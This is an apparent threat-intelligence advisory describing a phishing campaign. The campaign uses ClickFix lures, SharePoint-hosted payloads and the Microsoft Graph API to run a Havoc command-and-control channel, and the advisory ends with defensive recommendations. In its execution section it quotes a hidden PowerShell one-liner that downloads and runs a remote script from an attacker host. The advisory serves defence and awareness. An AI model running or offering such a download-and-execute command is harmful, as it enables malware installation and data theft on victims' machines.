Havoc C2 Goes FUD: Sharepoint & Microsoft Graph API Abused For Stealthy Attacks

Published Date: March 4, 2025
Category: ShadowOpsIntel
Share:

Fortinet’s FortiGuard Labs has identified a new attack campaign leveraging Havoc, an open-source post-exploitation framework, to create a fully undetectable (FUD) Command and Control (C2) system using Microsoft SharePoint and the Microsoft Graph API. The threat actor uses SharePoint as a hosting platform for payloads, while the Graph API helps obscure malicious C2 communications within legitimate Microsoft services.

Severity Level: High

Threat Overview

1. Initial Access – Phishing Email

Delivery Method:

  • Attack begins with a phishing email containing an HTML attachment named Documents.html.
  • Uses ClickFix social engineering tactics to trick users into executing a malicious PowerShell command.

Execution Trigger:

  • Victim opens the HTML file, which displays a fake error message instructing them to copy & paste a PowerShell command.
  • Example of the PowerShell payload: powershell -w h -c “iwr hxxps://hao771[.]sharepoint.com/…|iex”
  • This command downloads & executes a remote PowerShell script hosted on SharePoint.

2. Execution – PowerShell Loader

  • PowerShell Execution Steps: Decodes Base64 payload embedded in the HTML file, Downloads an additional PowerShell script from SharePoint, Runs in hidden mode to avoid detection, and Deletes registry entries under HKCU:\Software\Microsoft as an infection marker.

3. Secondary Payload – Python Shellcode Loader

Python-based execution steps:

  • Checks for Python installation (pythonw.exe); if not found, it downloads it.
  • Executes a Python script (payload_20250107_015913.py) in hidden mode.
  • The script acts as a shellcode loader, executing malicious payloads in memory.

Russian Debugging Strings Found:

  • o Выделение памяти (Memory allocation), Запись в память (Write to memory), and Выполнение shellcode (Execution of shellcode). This suggests potential links to Russian-speaking threat actors.

4. C2 Communication – Microsoft Graph API

  • The modified Havoc Demon DLL is executed, using Microsoft Graph API to communicate with SharePoint-based C2 servers.
  • Hardcoded credentials are used to generate OAuth 2.0 tokens for API authentication.
  • The malware creates two files in SharePoint for C2 data exchange:
    – {VictimID}pD9-tKout → C2 Commands (Sent from attacker)
    – {VictimID}pD9-tKin → Response from infected system
  • Once C2 is established, the commads include gathering information about the target, file operations, command and payload execution, token manipulation, and Kerberos Attacks.
  • Stealth Factor: Since all traffic is encrypted and disguised as legitimate Microsoft Graph API activity, it bypasses many security tools.

5. Data Exfiltration:

  • Stolen credentials, system logs, and sensitive files are uploaded to SharePoint C2 servers using Microsoft Graph API PUT requests.

Covering Tracks:

  • The malware deletes logs & temporary files to erase forensic evidence.
  • C2 files {VictimID}pD9-tKout and {VictimID}pD9-tKin are removed after execution.

Recommendations

  1. Implement email filtering for suspicious HTML attachments.
  2. Disable or restrict PowerShell execution for non-administrative users.
  3. Use PowerShell Constrained Language Mode and Script Block Logging (Log ID 4104).
  4. Monitor Python script execution (python.exe, pythonw.exe) in sensitive environments.
  5. Restrict Microsoft Graph API access where not needed.
  6. Restrict API access to approved applications only.
  7. Use role-based access control (RBAC) to limit SharePoint and Graph API permissions.
  8. Keep Windows & Microsoft 365 Updated.
  9. Enforce OAuth 2.0 and disable outdated authentication methods (e.g., Basic Auth, NTLM).
  10. User Awareness: Train employees on phishing email detection and social engineering tactics. Warn against copying and pasting PowerShell commands from emails.
  11. Block the IOCs at their respective controls.
    https://www.virustotal.com/gui/collection/9a99d459b54bbbd9a6dc5ebb130c7159ce017929164a797ceee650dbcb52061d/iocs

Source:

  • https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn.